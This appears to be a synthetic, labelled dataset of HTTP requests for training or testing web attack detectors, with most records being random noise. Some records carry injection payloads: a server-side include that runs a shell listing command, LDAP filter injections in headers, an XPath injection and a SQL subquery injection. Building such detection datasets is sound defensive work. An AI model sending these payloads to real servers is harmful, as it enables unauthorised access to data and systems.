oxtt5oN=enaalra2zrepho&xci0um2tart= ior2eaamBaoreval&anehHeole=net&eao=y2laSrncIn2eslTn0f&anyl=5eiieyxnuc&owindow.openXEqYjnodeboot.iniq=111&cmBtm0rnqsjts=4471384&cNJM1=36750&igeflg=cst&95oathcntx3qjb=desseuiodyiA4&meatyrto2=7405&w6a=Ni&oasst=9

End - Id: 5665
Start - Id: 28364
class: Valid
GET /ejwOCtRG5EoJi3B/uS2wXwHq97e/ukfS8VYtA/e5l/hzoeVB87G/1uehs9kn5dttcoolu5/9NzOoOmochac/0d.vGU4l_F4c/Thaehtn8etmauegn/cLtzrmhgxn_9Mc.css? HTTP/1.1
Host: 195.29.242.167
Connection: close
Accept: application/*;q=0.8, text/xml;q=0.2, video/mpeg
Accept-Charset: euc-kr;q=0.1, iso-2022-jp;q=0.1, windows-1251;q=0.4
Accept-Encoding: 
Accept-Language: eoiedtn-oy0a;q=0.8, 8t-yz8hIser;q=0.3, yfaopna-csud;q=0.5
Cache-Control: jdeO=eegntmje
Client-ip: 52.92.158.180
Cookie: wE0der0e7rvnOhd=te;suatteen2Ea70=630692;TzQFm7X=uha3lnetcat&iobjectQ;at8g7ig9oao=ado3io3deqoNt3;eeouateHHssdlb=1263357554;trsA=rer8ai|og4h
Cookie2: $Version="196"
Date: Sun, 09 Nov 08 11:55:20 CET
ETag: W/"Rv9qS5.Q4IyyTJEOsj"
Expect: egty3=cswosyo;shuiU6
From: riseo@ltadbo.st
If-Modified-Since: Mon, 16 Mar 09 16:33:00 GMT
If-Unmodified-Since: Sun, 11 Apr 10 19:40:35 GMT
If-Match: "3zPMLCpnxJNoWocFR"
If-None-Match: *
If-Range: Wed, 03 Mar 10 24:57:44 GMT
Max-Forwards: 0576
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic dGVTNGE6VGZ0aA==
Authorization: asre eeobs=oibp
Range: 5-362340,-79,830-62
Referer: /etninEe/usotnj.shtml
TE: trailers,trailers
Trailer: Upgrade
User-Agent: N7Arht
UA-CPU: StrongARM
UA-Disp: 780,2913,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6491x0728
Via: HTTP/9.8 76.241.190.133
Transfer-Encoding: compress
Upgrade: eaa/1.9
Warning: 347 147.194.234.174 "AYtgenf8eueNtskYttu" 
X-Forwarded-For: 156.99.87.237
X-Serial-Number: 3075652
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28364
Start - Id: 39961
class: SSI
GET /BnUtEsrtsnbgbmEnni/eC7ewmAGUrl2qDqTDN4/sgNiifeiB@y.msf?eaqiSaniw=djuyhtzUlew3oreiE&lvnJ7l3z=%3C%21--%23exec++cmd%3D%22%2Fbin%2Fls++-l+%2Fhome%2FsaOeBny%2Fh3ao%22++--%3E&llphapwa1craoe=138&Wraccept-3winntZKusr1=8717&niagecM=h4.gVaIFKGB5&lbliifoeh=okhicuumFwgtj7&oo=Er+bC%5Baabietedi HTTP/1.1
Host: www.ehlea.st:83606
Connection: close
Accept: audio/*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.8, identity;q=0.8
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 183.52.12.49
Cookie: Suwfpltaar0=8;ylgdytnsuoeant=93438;3R3Z-4pob=120438001;LihockBdrnf=1883;E1qcopy6.=57;mophao=1XZEJy
Cookie2: $Version="14"
Date: Fri, 01 Oct 04 20:10:12 GMT
ETag: W/"kT0uPx4hGu-xBjDxNmhh"
Expect: 100-continue
From: so7e5@hesdawuna.uk
If-Modified-Since: Thu, 23 Jul 09 20:11:20 GMT
If-Unmodified-Since: Thu, 26 Jan 06 22:27:46 UTC
If-Match: *
If-None-Match: *
If-Range: "YavZqkjOeTOFp6nQ"
Max-Forwards: 87
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: tcu6 tcnh=eocvriTe
Referer: /hcatnct/n35fu.cfm
TE: trailers
Trailer: Connection
User-Agent: t0gB1QN http://www.dlvwue.st
UA-CPU: Sparc
UA-Color: color16
Via: 7.7 www.za0s.css, FTP/1.2 95.97.7.176:270
Transfer-Encoding: identity
Upgrade: snt/4.7, 9diah/5.8, zl6/2.7
Warning: 920 2.33.97.58 "exoEohddhnP0c4dewku" "Sun, 06 Apr 08 17:14:18 CET"
X-Serial-Number: 754321
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39961
Start - Id: 33412
class: Valid
POST /ttyosejtElr4ccie/6sQ.jpeg? HTTP/1.0
Content-Length: 225
Content-Language: 7e,uti,s
Content-Encoding: identity
Content-Location: http://www.Tier.biz/8eshteu.pl
Content-MD5: ZW9laWR2aWF0ZW1veGlycw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Oct 06 07:11:05 GMT
Last-Modified: Sun, 18 Dec 05 08:28:02 UTC
Host: www.sNsi3Te6.de
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.3, compress;q=0.1, deflate, compress;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 176.30.127.43
Cookie: uEqepl=1043347;6rlavs8=evalcatua;hgiiinvdl=65;5wkaidaaast==Eiw
Cookie2: $Version="89"
Date: Wed, 28 Apr 04 03:13:28 GMT
ETag: W/"60IDLh3ofRYVDqXC"
Expect: 100-continue
From: ooydtlh@tuohEicue.de
If-Modified-Since: Wed, 28 Sep 05 07:59:31 GMT
If-Unmodified-Since: Sat, 17 Sep 05 16:33:41 GMT
If-Match: *
If-None-Match: "SDOpK3POyn.opFqovI"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: nu9hs uajtVt=hdo1
Authorization: Basic bVJmM0k6ZXhvZ2EzbzI=
Range: -45727
Referer: http://hacm3uN.be/t6aor/ctto.asmx
TE: gzip;q=0.2,trailers,deflate
Trailer: Range
User-Agent: Mozilla/3.4 (compatible; Konqueror/5.1; Solaris; yosd8; iTbutuai)
UA-CPU: x86
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 669x659
Via: HTTP/8.8 www.falso7hs.tiff
Transfer-Encoding: compress
Upgrade: lgrd4/0.7, r3p/6.7, la3e/8.5
Warning: 647 164.77.60.132 "hnhznlfessi6tA" "Sun, 14 Feb 10 03:58:44 GMT"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

aee=gstencci0uH&4YBZe=67662990&15n6eeastau=435756&6gggeihn1=3oa&aspeeeedle=td )shtnr&7nnetcat@=9207&aePhAe=phTee&llAshutdownrpTHtEZS=sssdI26esmch4ruinwra&qYJupdate1Ur=et1JOvd5&tki2ites=v &o8drtlnyaoy= iinaahF=L+oedelete

End - Id: 33412
Start - Id: 6379
class: Valid
POST /snsEtNaneimistM/s0gPdo2TNbw/KJ.QDLxBk.ceM6home/e7L/q7-/hDta.pl? HTTP/1.0
Content-Length: 38
Content-Language: 2tt,srRi,te
Content-Encoding: identity
Content-Location: http://www.ehuun.uk/css8es/omRlr8/ytex/pnBs7ie/dteua3.tiff
Content-MD5: UnVuZmtXbGVpbGthamNsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Jun 05 01:01:52 GMT
Last-Modified: Wed, 19 Nov 08 15:13:29 CET
Host: www.emW0.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3;q=0.9
Accept-Encoding: identity, gzip, compress;q=0.5, gzip
Accept-Language: w-eplttemz;q=0.5, P-meicfi;q=0.3
Cache-Control: only-if-cached
Client-ip: 131.113.21.178
Cookie: yanceiahn=4364338047;bc3oiua5srer=A);mEe=rons\7rhsrgAsrd
Cookie2: $Version="01"
Date: Thu, 13 Aug 09 21:04:57 CET
ETag: "ztr5kx-J3rsBtlKllSl"
Expect: uUAn
From: aeaRObe7@bmrmit3a.ch
If-Modified-Since: Tue, 22 Jul 08 10:33:13 CET
If-Unmodified-Since: Fri, 02 May 08 23:12:10 UTC
If-Match: "SgvHDXXnN3qh92Mk"
If-None-Match: "HxA@hlfbE9mi5i7"
If-Range: Sun, 09 Dec 07 21:42:00 UTC
Max-Forwards: 2718
MIME-Version: 2.4
Pragma: nsbDi='oul'
Proxy-Authorization: BWclfI nlmer3I=a7iC1bxh
Authorization: Digest nonce
Range: -212916,32-,828-
Referer: /elou/ykie/er7o/sinlnhxa/dsmioe.dll
TE: gzip
Trailer: Accept-Charset
User-Agent: 4nthrzedo
UA-CPU: MIPS
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1266x859
Via: HTTP/1.1 www.eqa2e.png:9, EswjM/8.5 www.omevmsht.tiff:36289
Transfer-Encoding: deflate
Upgrade: ncahco/7.2, gadnon/5.9, tgT/1.9, ntgBt/5.7, 4czebm/3.0
Warning: 328 3.138.213.144 "lmuOhocahea5tEu" 
X-Forwarded-For: 211.154.68.138
X-Serial-Number: 50151670424
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

l8exds=2130017597&atlda2esbmet4G=dZj9m

End - Id: 6379
Start - Id: 32396
class: Valid
GET /iu/bri.pl?tef=re%404&3eCdedo=oJ.7R&Wgroup bymetarperl=9978&amvl=2&hlfhoa8ad=ltmpuksamfv%3EnaStOad&toe=uL.JQ5HtT&l1na=Hp3Wcttn&Upuj.5LscriptfHj=vaa6vn&nhl=56863&1Qmkrisn00feir2=20893858&AnT=nya&mc=aatehrtaHE9aziseR HTTP/1.1
Host: 184.128.177.101
Connection: 2net
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, identity
Accept-Language: ircrwssw-thmsBu;q=0.2
Cache-Control: no-transform
Client-ip: 51.200.81.150
Cookie: iitYhVcni5ezlIe=xp_t&iix7esra
Cookie2: $Version="701"
Date: Sat, 28 Nov 09 07:59:36 GMT
ETag: "ybl.IHnOtNqP2AnbpQv3"
Expect: 100-continue
From: itad@eosuny.org
If-Modified-Since: Fri, 30 Apr 10 04:56:34 CET
If-Unmodified-Since: Mon, 19 Sep 05 11:07:22 UTC
If-Match: *
If-None-Match: "fe2mvaZRUedzmTeMF-6"
If-Range: Sun, 18 Mar 07 13:50:32 GMT
Max-Forwards: 9362
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM bXV5c3NXdG5lc2xtN2Q3aFRlbjlTYXRkZWVvbmFlYkRlaHM0Yzg=
Authorization: NTLM aU54b2FsZm9ic2hTc3dpaGVqaGl0d2lzZHZubGFlSW5zbmNTZWxhMmZp
Range: 156924-9
Referer: http://www.tnsr.uk/zdPe4oaT/trfsYci/iora/gathsteD/qRuflmrI.png
TE: trailers,gzip;q=0.6,trailers
Trailer: Warning
User-Agent: sZrr/2.7.7.6
UA-Disp: 281,7423,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 441x524
Via: HTTP/8.6 127.120.31.106, 7.9 www.cge57it0.css:27, 0.6 www.eeolbee.jpg
Transfer-Encoding: identity
Upgrade: ddG/8.0, tra/2.3
Warning: 620 www.jgtesooe.tiff "ezqhi" 
X-Forwarded-For: 130.13.184.238
X-Serial-Number: 2700091210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32396
Start - Id: 37322
class: LdapInjection
GET /nY-A0OBwMVSi3c/pEZ4.QrTN@On_LQ__X/oeanndu8gloiaiot4.css?ASnNGU@=Wihot4aa&0k=m&xqCEV3inll=00954&YAF8styleiNGI=oetw+rka3+tsshutdown%3Eg4+E&Gi@imhJr=6991 HTTP/1.1
Host: www.qmrgtle3n.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5;q=0.9
Accept-Encoding: )   (   |(    cn=*o 'brien*)(mail   =*o'brien*  ) 
Accept-Language: 16)(&(objectClass=Dav)(|(sn=   gyn)(cn=dlod J*))
Cache-Control: only-if-cached
Client-ip: 68.215.146.126
Cookie: otasqwssmH9t=731
Cookie2: $Version="6"
Date: Mon, 20 Jul 09 09:46:42 CET
ETag: W/"uBEnk_ewfagQCEg3Ql"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Fri, 03 Jul 09 12:02:52 CET
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: *
If-None-Match: "b5d.3QlkL0b1@pFN7GZ_"
If-Range: Fri, 26 Feb 10 13:48:16 CET
Max-Forwards: 321
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM aWgzbmF0aXNlZnNlcjlodG1hdGxtU3IycnRsZWFPTjdibms=
Authorization: NTLM ZWFvbFN0dFJNYzBqcmUyM2x0ZXR1cm50bzRDYTluZEZuZWVjeWY=
Range: 1-568088,6956-8,075-
Referer: http://twfsr.ch/RbdD/dOai.bin
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: Mozilla/6.9 (Machintosh; U; PPC 8.3; ro-mt; rv:3.9.9) Gecko/75896432
UA-CPU: StrongARM
UA-Disp: 2661,0577,16
UA-Color: color16
Via: 8.3 100.197.150.40, 6.7 www.8hAe.tiff, HTTP/2.7 www.nauUrl.shtml
Transfer-Encoding: deflate
Upgrade: wnnr/5.6, rfetYt/6.7
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 220.106.136.48
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37322
Start - Id: 27274
class: Valid
GET /YBXIwQoA3/od50iyqz2Ayayg/rht41klHHhoTUVrOgsN/gnaxaD3FYDNF/npM0iiy1OMRFe.aspx?k9dtae7rey=saZSpiHpGnoJ&oteCti=gpNn7mekd0ibSi&xkebaetk=338944547&arsrytadole=shicctfs%5CseWNi&au=%3Bte&xhPXiepovK=114188 HTTP/1.0
Host: 91.52.133.42
Connection: keep-alive
Accept: image/png, video/*;q=0.3, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oeesfn-arr, cyley65c-5nehnDj;q=0.2
Cache-Control: min-fresh=6702
Client-ip: 227.133.246.172
Cookie: eeo=120041938;lSSooastm8c6=ntoanllteyd;woSiisjne=054066970;eytthkoeob=Egrotot
Cookie2: $Version="881"
Date: Wed, 21 Jun 06 12:58:42 CET
ETag: "7JUjHZa@ZZr.UhdzC"
Expect: 100-continue
From: leReh@DeoN7aa.de
If-Modified-Since: Tue, 24 May 05 13:52:18 GMT
If-Unmodified-Since: Tue, 09 Aug 05 24:00:42 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 29 Jul 04 22:15:47 CET
Max-Forwards: 9164
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM dG1ucmlod2lyY3R0dHlvaGtldG5oc2xzdWRoN1h4bmV5Tm9laGVpZGdk
Authorization: Digest realm
Range: 392-,66898-,-0761
Referer: /u6hfuyen/nt4Kb/dSousrim/kvlWwi/idoo.swf
TE: deflate;q=0.6,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.4 (Machintosh; U; PPC Mac OS X 6.5; ad-s1; rv:3.8.8) Gecko/64841133
UA-CPU: 68000
UA-Disp: 4717,242,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6912x6352
Via: 2.3 221.174.144.81:6224, rtd4/8.1 www.f4tfS0le.gif, uoaei/8.6 80.124.164.55
Transfer-Encoding: identity
Upgrade: rQ2sO/0.1, ote/0.2
Warning: 782 www.Uhsrchsr.jpg "soB0oaE" "Wed, 08 Nov 06 06:46:53 GMT"
X-Forwarded-For: 93.210.190.113
X-Serial-Number: 75164077038098175
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27274
Start - Id: 14759
class: Valid
GET /iiestFss/RInpni/unysabnadhcIMoNlxpi/st/aFvvarl1WGcymail/yoitrlbla.swf?hyir7=tlikes&sh=rD6&3ppceEBd=9&updateGrmQWtCj4u7=oetc&pGLnrSesesMpcl=sdr&npewose1lyhdi=nqoqform%3B%25rlta6sc&aInrtnAe5=c7UTwFF&lpmhVo=oe HTTP/1.0
Host: 92.69.82.124
Connection: Hpdet5ii
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: fsnt-otouee;q=0.0, u4siisat-yltt;q=0.0, dznrirn-tot, h-esnvoar2
Cache-Control: no-transform
Client-ip: 251.25.146.32
Cookie: x3kGo=imtui
Cookie2: $Version="7"
Date: Thu, 30 Aug 07 07:06:59 UTC
ETag: "APGpywQRqorY-BwL"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Fri, 21 Jan 05 04:01:34 GMT
If-Unmodified-Since: Sat, 13 Dec 08 03:39:47 GMT
If-Match: *
If-None-Match: "zF-z3lCOO6EeE0fh_KB"
If-Range: "ZTGVjf@V7a9mnet3W"
Max-Forwards: 2063
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: el3ew eon38=myylbi
Authorization: Digest nc=d9e25cee
Range: 31145-
Referer: /detrrne/petel/o7ce.tiff
TE: trailers,trailers
Trailer: Accept
User-Agent: Atseaars
UA-CPU: Sparc
UA-Disp: 1839,4933,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3390x3162
Via: HTTP/7.3 www.hBalr.tiff:13125
Transfer-Encoding: gzip
Upgrade: fnhcG/7.7, 5Uaboe/0.6, satvhh/2.7
Warning: 068 www.th4ir3.htm "lsnwNndt" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 0800772649
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14759
Start - Id: 49437
class: XPathInjection
GET /eefee/omh4afeoseBxMceT/uhy9.tA0QnullcRmjx/1tsyii/rltn/5po0ttnd/cu/enopUepup5/yfE.nsf?0s3ysne=ert0u&rhrwDao8dw=59+++or+++icisma%2FToax%2Fs9bl%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D678%5D+or++8%3D HTTP/1.1
Host: 7.71.126.98
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=76
Client-ip: 111.175.169.32
Cookie: hRta=0
Cookie2: $Version="9"
Date: Wed, 07 Feb 07 18:08:42 CET
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: a15tta=behdai;yearlc=mn7sjuc
From: poiter@eorm.biz
If-Modified-Since: Tue, 28 Mar 06 19:33:43 UTC
If-Unmodified-Since: Tue, 20 Dec 05 18:26:55 UTC
If-Match: "rpE4w66fU62dXkb21"
If-None-Match: *
If-Range: Tue, 12 Apr 05 10:44:51 UTC
Max-Forwards: 64
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: NTLM YWVhZXJSbWlwaDlobnJvemNhOWhlMHl0M3RjdHR5UGl1czh4
Authorization: NTLM aG54eWh0TWRuY29kYWFhcmRlaWFhTjFldGJ0YW5pZmE=
Range: 60-32,32547-,55039-
Referer: /nltSFnn6/sjlcs/SahtiE/ibsthn.exe
TE: trailers
Trailer: Expect
User-Agent: Mozilla/2.0 (Machintosh; U; PPC 8.8; d0-gd; rv:2.8.3) Gecko/77972723
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5208x110
Via: HTTP/7.6 www.dte4Nf.jpg
Transfer-Encoding: ofet; oyloye=ti7qs1
Upgrade: e0oOd/9.2, ouh2i/3.3, Ncur/2.5
Warning: 727 www.0daudryu.htm "hsLesemehtnrtasserx6" 
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49437
Start - Id: 39014
class: LdapInjection
PUT /8vH/nctjsdnfnoadesNadsr/passthruwSDnlmP9acceptZU9T/4T15_52zPo1r.jpg? HTTP/1.0
Content-Length: 147
Content-Language: dttsra,rinte8s
Content-Encoding: identity
Content-Location: /rKots/hyacl.wav
Content-MD5: YXRmbG40Y3FsdHNsaWVhdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Aug 05 13:04:07 GMT
Last-Modified: Sat, 10 Jan 04 10:41:06 GMT
Host: www.o4rentoe.fr
Connection: qohaE
Accept: application/*;q=0.6, text/xml, text/html
Accept-Charset: iso-2022-jp;q=0.1, euc-tw, utf-7;q=0.9
Accept-Encoding: gzip, gzip
Accept-Language: 7990)(&(objectClass=mase)(|(sn    =    bt)(cn=kt6o    J*))
Cache-Control: max-stale
Client-ip: 103.25.9.144
Cookie: tbsroqsa1il=l2-FdOj6n;esaaieAakedpi=t4oeces
Cookie2: $Version="997"
Date: Thu, 20 Aug 09 07:58:31 CET
ETag: W/"lXyrX6B53KtLWw4i1K3"
Expect: Oupd=rydr
From: rtYnihG@mn4eem.gov
If-Modified-Since: Mon, 19 Jun 06 16:47:38 CET
If-Unmodified-Since: Mon, 26 Jul 04 17:55:04 GMT
If-Match: "rXEy3Cuecey8znJJSX"
If-None-Match: *
If-Range: Fri, 16 Sep 05 10:46:55 UTC
Max-Forwards: 185
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: 6nrucs het0=Atese
Authorization: oae2n5 lfaLe3l=lwblep
Range: -085
Referer: /dertrer/3npd/aco9/2nyS/mtoo0vj.wmn
TE: chunked,chunked
Trailer: User-Agent
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 5.1; 0l-es; rv:8.2.7) Gecko/92709492
UA-CPU: 68000
UA-Disp: 744,650,16
UA-Color: color16
UA-Pixels: 960x5747
Via: akaawo/6.0 209.158.37.155:4724, HTTP/6.8 162.232.204.166
Transfer-Encoding: gzip
Upgrade: yuanig/5.9, tImh/5.1
Warning: 717 67.113.202.67:1 "ssl4asgs3riaesdgfrre" 
X-Forwarded-For: 236.228.179.215
X-Serial-Number: 13381334
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dcd=019818&sla4tSttrycervb=oyd28zxtermO&9coeeedaette=6u0e0ja&7ko1lctaftdiea=433012559&aath=eRzheL4&8unionmochaxterm= eEoa3Rirh n&cTyepzuhutefwdi=i 

End - Id: 39014
Start - Id: 13664
class: Valid
GET /lsIv4zc@L/whhari1dt/r8bV_jg6buPoO/sewTewoslrnedh/m5zN/mkd0aI-0oxEYlogk0/insert2o/n4N.h2Nr/ALSO4f5xtermwJ/Dt7rayu8the3h1e8/oVKL/oc.dll?0r=j%3EEu2&Ra8O=42990&ripIiehn=t&Yooa=isjRaeGeg&4rcchndtseNarir=dJoTJAC8ZjtI&ri0zotrbtcmnm=ee&iEiro=a%7C%26mecm7L&eei=t+23%24&ere=irbintho+&adminninGepX@g=eiqoaxOshstAx&RaEautoexecncaa=rEn08JaySMO5&s2emrstflvi=eoem&olaAeacAOio=taS HTTP/1.1
Host: 48.132.46.250:50198
Connection: close
Accept: audio/*, audio/*;q=0.5, application/*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: identity, deflate, identity;q=0.7, gzip, gzip;q=0.5
Accept-Language: *;q=0.5
Cache-Control: min-fresh=442
Client-ip: 148.192.91.169
Cookie: DchildLg=20991760;Q-jSM2OH@d=1Rldb;RcJFTKL7kz=[ ;idEonemam=utcMJ7J0K9u8;rsa=826628
Cookie2: $Version="69"
Date: Thu, 29 Sep 05 18:34:58 GMT
ETag: "LoJhSvTwoa9khd@"
Expect: 100-continue
From: 2uses@EiiTw.cz
If-Modified-Since: Thu, 11 May 06 14:51:30 CET
If-Unmodified-Since: Thu, 09 Nov 06 19:05:00 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 27 May 09 22:12:49 CET
Max-Forwards: 0543
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="eLtokse"
Authorization: NTLM d25vcjlvd3JocnNkVGNzUGhpZXNzcGRyckVvU3Rkbjg=
Range: 7-8,-418041
Referer: http://2csu0.com/netf.cgi
TE: chunked;q=0.8,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.6 (Windows; U; WinNT 2.9; s4-ns; rv:2.1.7) Gecko/92125183
UA-CPU: StrongARM
UA-Disp: 0718,4997,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x4906
Via: 2.6 www.Taiko1ee.html, 6.4 40.154.60.138:0
Transfer-Encoding: deflate
Upgrade: yfg/1.7, sAr/9.1
Warning: 810 233.40.240.2:75910 "hppilonufanrr5o" "Tue, 05 Oct 04 06:33:59 UTC"
X-Forwarded-For: 43.38.172.20
X-Serial-Number: 02500062912801761
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13664
Start - Id: 27528
class: Valid
GET /a9dDf0oqnnikltgccn/aE.htm?hqn2ls=s9eti&3deril=servicesg&8re=79707 HTTP/1.0
Host: www.Ftic7.uk:434
Connection: htaI
Accept: */*;q=0.8
Accept-Charset: iso-8859-4, x-mac-chinesesimp;q=0.4, utf-7, utf-8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 34.117.164.116
Cookie: ee1n0iThq=e> ;nesnie=723
Cookie2: $Version="154"
Date: Sun, 12 Aug 07 23:29:55 CET
ETag: "C16GhkuS3HgCb48Ra"
Expect: idipe=Guooeeo4;dkhes=ottorc
From: jdne@cltrleiio.gov
If-Modified-Since: Wed, 26 May 04 02:07:40 GMT
If-Unmodified-Since: Thu, 18 Dec 08 22:43:04 UTC
If-Match: "QA9QWdP8-ZYqWVoK"
If-None-Match: "57Xcky93z21hgukSqr9"
If-Range: Thu, 23 Mar 06 17:11:48 UTC
Max-Forwards: 4835
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic bmVyY2x0OnBhSTl3Yw==
Range: 895579-,54531-,8-
Referer: http://www.unaheeai.cz/odxoh/reWevek/twndh/gbwrr1ih/tinep.js
TE: chunked;q=0.0,gzip,chunked
Trailer: Max-Forwards
User-Agent: iMq7WWfo http://www.ohoa.cz
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0727x861
Via: FTP/2.4 www.nSwntr.html
Transfer-Encoding: identity
Upgrade: Npnao/5.5, 7inei/1.4, 1fe/9.6
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 224.28.160.220
X-Serial-Number: 427762626542035
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27528
Start - Id: 41578
class: SqlInjection
GET /cEJh/EtZx/iei8fg3oiesd8Q4rt0e/ewGmeoXJ0E2Oih5/99H2V.OT1gFK/tgiojs/uys8telnetp/ggetynatcz.cgi?3av=ooZZDN&tbeg6iloOI=sbinee&ahgo=gi%2FbefromWpasswda%3Ael&ROFI1hxp_f=ohhsstdinmdonreplace&c1dcTAh=0087&ENin7vPTKb=%27+++++%2B+++++%28++SELECT+TOP+++1++++ilr+++FROM++++eiqcs%29++%2B+++++%27&hla3pwlaoibn=ktyt1ahm+Hfromo%3Fe1rBaccess_log&ruIritee=rntNf5uA25aTe2eiEu&4hcoahagtgfc=n0rhl&nfsgaetb=dae%5CoEietdncatSr&RawdRntus=929829&1oEy8ah=mpco3F2BMX_7&-LEjW6HHPW7=330326295&88si0aroalht=+3ctrerdLdo&cnnrPtencpm=lDqefNRSCgjU HTTP/1.0
Host: www.lidop.fr
Connection: euit
Accept: video/mpeg;q=0.3
Accept-Charset: windows-874, windows-1252;q=0.9, x-mac-ce;q=0.0, x-mac-roman, koi8;q=0.4
Accept-Encoding: 
Accept-Language: 7te-en36d, aueepHa-cthie6a;q=0.2, tneabcon-lt88cms, hwoo-oEd
Cache-Control: only-if-cached
Client-ip: 237.68.176.239
Cookie: hStT5g=jY2J1;Oethrashnawo=i-nadminsswiframeeaallsnfk;tj3ucsdrleedd=erri;yu@LK2Zn.40G=3qC0V6n7js;systemZeY=n krntn;tbtea=d549@CUi4
Cookie2: $Version="8"
Date: Sun, 15 Feb 04 21:46:32 CET
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Fri, 07 Mar 08 22:23:14 GMT
If-Unmodified-Since: Thu, 17 Aug 06 15:33:44 GMT
If-Match: "6JSVC8JVtlS90@dW"
If-None-Match: *
If-Range: Wed, 30 Nov 05 03:35:24 GMT
Max-Forwards: 98
MIME-Version: 3.1
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: NTLM TGF0YmFpbXRVZW5uaXRLYWk1dWZVcnJhZE1uaWhzZXJheWVzZGRo
Range: 629953-,-3
Referer: http://www.Et5thr.org/maeyth1g/6oetaitu/q7o5btds/eR0nhe.msf
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: bwwtlsc/2.7.5
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: 2.8 116.214.112.149, 1.1 102.182.25.191:36362, 8.1 www.rIlb.jpeg
Transfer-Encoding: identity
Upgrade: eia/5.7
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: --------------------------------
